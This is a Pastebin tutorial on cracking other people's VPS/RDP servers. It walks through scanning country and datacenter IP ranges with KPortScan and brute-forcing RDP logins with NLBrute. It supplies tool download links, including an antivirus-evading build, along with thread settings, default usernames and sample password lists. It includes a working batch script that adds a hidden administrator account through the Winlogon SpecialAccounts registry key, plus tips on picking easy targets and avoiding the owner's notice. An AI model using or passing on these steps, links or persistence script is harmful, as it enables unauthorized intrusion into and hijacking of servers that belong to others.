Advertisement
LegitDude

Untitled

Mar 9th, 2019
222
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.34 KB | None | 0 0
  1. WHAT IS A VPS/RDP AND WHAT IS USE FOR
  2.  
  3.  
  4.  
  5.  
  6.  
  7. A Virtual Private Server (VPS) is a virtual machine sold as a service by an Internet hosting service. A VPS runs its own copy of an operating system (OS), and customers may have superuser-level access to that operating system instance, so they can install almost any software that runs on that OS.
  8.  
  9.  
  10.  
  11. why we need to use them?!
  12.  
  13.  
  14.  
  15. when you try to crack some accounts on your own PC, you need to wait a lot of time and you need fast internet and traffic and more issues
  16.  
  17. like when you try to user cracking with SentryMBA may this take about 1 day to check all of the passwords! and it's same about VPS cracking!
  18.  
  19. and also VPS are stronger, faster, and more acceptable that home PC!
  20.  
  21.  
  22.  
  23.  
  24.  
  25.  
  26.  
  27.  
  28.  
  29.  
  30. WHAT TOOL RECOMMENDED TO USE?!
  31.  
  32.  
  33.  
  34.  
  35.  
  36. Actually, for connecting to a VPS, you need the VPS IP address, User, and Password! and you should connect them with REMOTE DESKTOP CONNECTION (search on windows search bar)
  37.  
  38.  
  39.  
  40. THIS IS A QUESTION'S!
  41.  
  42.  
  43.  
  44. HOW TO GET IP ADDRESSES?!
  45.  
  46.  
  47.  
  48. you can get them by using site's below and you need to scan them with Kport Scan for each country!
  49.  
  50.  
  51.  
  52. FOR SPECIFIC COUNTRY
  53.  
  54. https://www.countryipblocks.net/country_selection.php
  55.  
  56.  
  57. FOR SPECIFIC DATACENTER!
  58.  
  59. https://myip.ms/
  60.  
  61.  
  62.  
  63. HOW TO GET USERS?!
  64.  
  65.  
  66.  
  67. most datacenters use public users for their VPS
  68.  
  69.  
  70.  
  71. the most users:
  72.  
  73.  
  74.  
  75. admin
  76.  
  77. administrator (can be different with the country language!)
  78.  
  79. user
  80.  
  81. guest
  82.  
  83.  
  84.  
  85. HOW TO GET PASSWORDS?!
  86.  
  87.  
  88.  
  89. you must make the password list by your own! and it's linked to your creativity! and of course experience
  90.  
  91.  
  92.  
  93.  
  94.  
  95.  
  96.  
  97.  
  98. WHAT IS A NLBRUTE AND KPORT SCAN?!
  99.  
  100.  
  101.  
  102.  
  103.  
  104.  
  105.  
  106. KPORT SCAN
  107.  
  108.  
  109.  
  110. KPORT SCAN is a tool for scan Ip range's that you get before!
  111.  
  112. what this tool do actually?! it scans IP range's and gives you the correct IP that has remote access (Don't crack VPS before Scan IP's)
  113.  
  114.  
  115.  
  116. DOWNLOAD
  117.  
  118.  
  119.  
  120. http://ghostir.ir/file/KPortScan%203.0.zip
  121.  
  122.  
  123.  
  124. VIRUS TOTAL
  125.  
  126.  
  127.  
  128.  
  129.  
  130. https://www.virustot...acd5b/detection
  131.  
  132.  
  133.  
  134. IF YOU GET ANY ERROR, USE THIS
  135.  
  136.  
  137.  
  138. http://ghostir.ir/file/vcredist_x86%20.rar
  139.  
  140.  
  141.  
  142.  
  143.  
  144.  
  145.  
  146. NLBRUTE
  147.  
  148.  
  149.  
  150. it's actually VPS/RDP checker and cracker! you need to put all info into the app and start cracking!
  151.  
  152.  
  153.  
  154. DOWNLOAD
  155.  
  156.  
  157.  
  158. http://ghostir.ir/file/NLBrute.zip
  159.  
  160.  
  161.  
  162. VIRUSTOTAL
  163.  
  164.  
  165.  
  166. https://www.virustot...df7f-1531457337
  167.  
  168.  
  169.  
  170.  
  171.  
  172.  
  173.  
  174.  
  175. HOW WE CAN CRACK VPS/RDP'S?
  176.  
  177.  
  178.  
  179.  
  180.  
  181. after getting IP ranges and scan them! you need to make the password list! and it's different for each country!
  182.  
  183.  
  184.  
  185. 1- open up NLbrute
  186.  
  187. 2- Set Thread by this setting:
  188.  
  189.  
  190.  
  191. ✅ SETTING THREAD IN NLBRUTE BY SERVER POWER ✅
  192.  
  193.  
  194.  
  195.  
  196.  
  197. IF PPS WAS UNDER 25, THREAD SHOULD BE 10
  198. IF PPS WAS UNDER 40, THREAD SHOULD BE 200
  199. IF PPS WAS UNDER 70, THREAD SHOULD BE 300
  200. IF PPS WAS Between 90 to 100, THREAD SHOULD BE 400
  201. IF PPS WAS BETWEEN 120 TO 200, THREAD SHOULD BE 500
  202. IF PPS WAS BETWEEN 200 TO 300, THREAD SHOULD BE 600
  203. IF PPS WAS BETWEEN 300 TO 400, THREAD SHOULD BE 700
  204. IF PPS WAS BETWEEN 400 TO 500, THREAD SHOULD BE 800
  205. IF PPS WAS HIGHER THAN 500, THREAD SHOULD BE 1000
  206. IF PPS WAS HIGHER THAN 700, THREAD SHOULD BE 1200
  207.  
  208.  
  209.  
  210. 3- load your PasswordList
  211.  
  212. 4- load your Scanned IP ranges
  213.  
  214. 5- load your Users!
  215.  
  216. 6- Start Cracking! (it takes a lot of time something like 23H, and it's not easy)
  217.  
  218.  
  219.  
  220.  
  221.  
  222.  
  223.  
  224.  
  225.  
  226.  
  227.  
  228.  
  229. WHAT WE GONNA DO FIRST, WHEN WE GET HITS?!
  230.  
  231.  
  232.  
  233.  
  234.  
  235. 1- Connect to VPS with Remote Desktop Connection
  236. 2- Going to! WebBrowser and go to History! if you find anything it means that someone uses this VPS! and you need to make a hidden user! so The builder will not notice your presence!
  237.  
  238. 3- write this commands on a notepad and save it as the .bat file! so when you open this bat file this make a hidden user on your VPS!
  239.  
  240. cd\
  241. cls
  242. REM "vps hide use creator"
  243. REM ------------------------------
  244. @Echo off
  245. set /p user=PLS INSERT YOUR USERNAME:
  246. set /p pass=PLS INSERT YOUR PASSWORD:
  247. net user /add %user% %pass%
  248. net localgroup administrators /add %user%
  249. reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v %user% /t REG_DWORD /d 0
  250. pause
  251. 4- go to task manager and performance and look at uptime! if it was low, you don't need to be a worry! no one uses this VPS before you!
  252.  
  253.  
  254.  
  255.  
  256.  
  257.  
  258. HOW TO WRITE A PASSWORD LIST?!
  259.  
  260.  
  261.  
  262.  
  263.  
  264. this is an important part! you need a powerful password list to crack VPS!
  265.  
  266. for making that you need to pay attention and be patient! cause it takes time!
  267.  
  268.  
  269.  
  270. we have many types of password list! like name, location, car name, random numbers, and more!
  271.  
  272.  
  273.  
  274. for example! you want to crack Germany datacenters! you should make a password list by using their famous place's names and more! or, you can use public passwords like admin, password123, numbers and more ...
  275.  
  276.  
  277.  
  278.  
  279.  
  280. admin123
  281.  
  282. admin@123
  283.  
  284. admin#123
  285.  
  286. ~admin_123
  287.  
  288. admin_2018
  289.  
  290. admin_2017
  291.  
  292. admin__!@#
  293.  
  294. !admin!
  295.  
  296.  
  297.  
  298. and more ...
  299.  
  300.  
  301.  
  302. Berlin123
  303.  
  304. Berlin@123
  305.  
  306. Berlin#123
  307.  
  308. ~Berlin12$
  309.  
  310. Berlin100%
  311.  
  312. Berlin_12#
  313.  
  314.  
  315.  
  316. for Russians use their language for password and also users!
  317.  
  318.  
  319.  
  320. администратор : administrator
  321.  
  322. админ : admin
  323.  
  324. гость : guest
  325.  
  326.  
  327.  
  328.  
  329.  
  330. Москва@123
  331.  
  332. Москва%25
  333.  
  334. Москва$123
  335.  
  336. Москва~`1
  337.  
  338. Москва@2018
  339.  
  340. @2018Москва
  341.  
  342.  
  343.  
  344.  
  345.  
  346.  
  347.  
  348.  
  349.  
  350.  
  351.  
  352.  
  353.  
  354.  
  355.  
  356.  
  357. ANYTIPS TO CRACK VPS?
  358.  
  359.  
  360.  
  361.  
  362.  
  363. - don't try to scan IP on famous Datacenter like Hetzener, 1&1, Amazon ETC ...
  364.  
  365. - remember! you need to be patient and you need Creativity skills to make password lists!
  366.  
  367. - first, before crack on cracked VPS, check if someone uses that or not!
  368.  
  369. - try hard passwords! but not too hard!
  370.  
  371. - if you are a beginner in VPS cracking don't try crack on big datacenters! do it with smaller
  372.  
  373. - china and Asian countries use public passwords! you can get hits Easy
  374.  
  375.  
  376.  
  377. F.A.Q
  378.  
  379.  
  380.  
  381. IF I GET ALOT OF HITS! HOW CAN I CHECK THEM FAST?!
  382.  
  383. USE THIS PROGRAM! IT'S VPS CHECKER AND GIVE YOU FULL INFO ABOUT YOUR CRACKED VPS
  384.  
  385.  
  386.  
  387. https://tlgur.com/d/9gjpRZ78
  388.  
  389.  
  390.  
  391. IS IT EASY TO GET A LOT OF HITS?
  392.  
  393. OF COURSE, IT'S NOT EASY! JUST IMPROVE YOUR CREATIVITY SKILL
  394.  
  395.  
  396.  
  397. IF THEY FOUND THAT IM USE THEIR VPS, THEN WHAT HAPPENED?
  398.  
  399. YOU FUCKED
  400.  
  401.  
  402.  
  403. IF ANTIVIRUS DETECT NLBRUTE AS VIRUS, IS THERE A WAY TO BYPASS IT?!
  404.  
  405. YES, USE THIS VERSION: http://anonfile.com/WcUco5f6be/doc_2018-07-12_20-15-48.zip
  406.  
  407.  
  408.  
  409.  
  410.  
  411.  
  412.  
  413.  
  414.  
  415. ENJOY THIS FULL GUIDE ;)
  416.  
  417.  
  418. A TUTORIAL BY @LegitDude
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement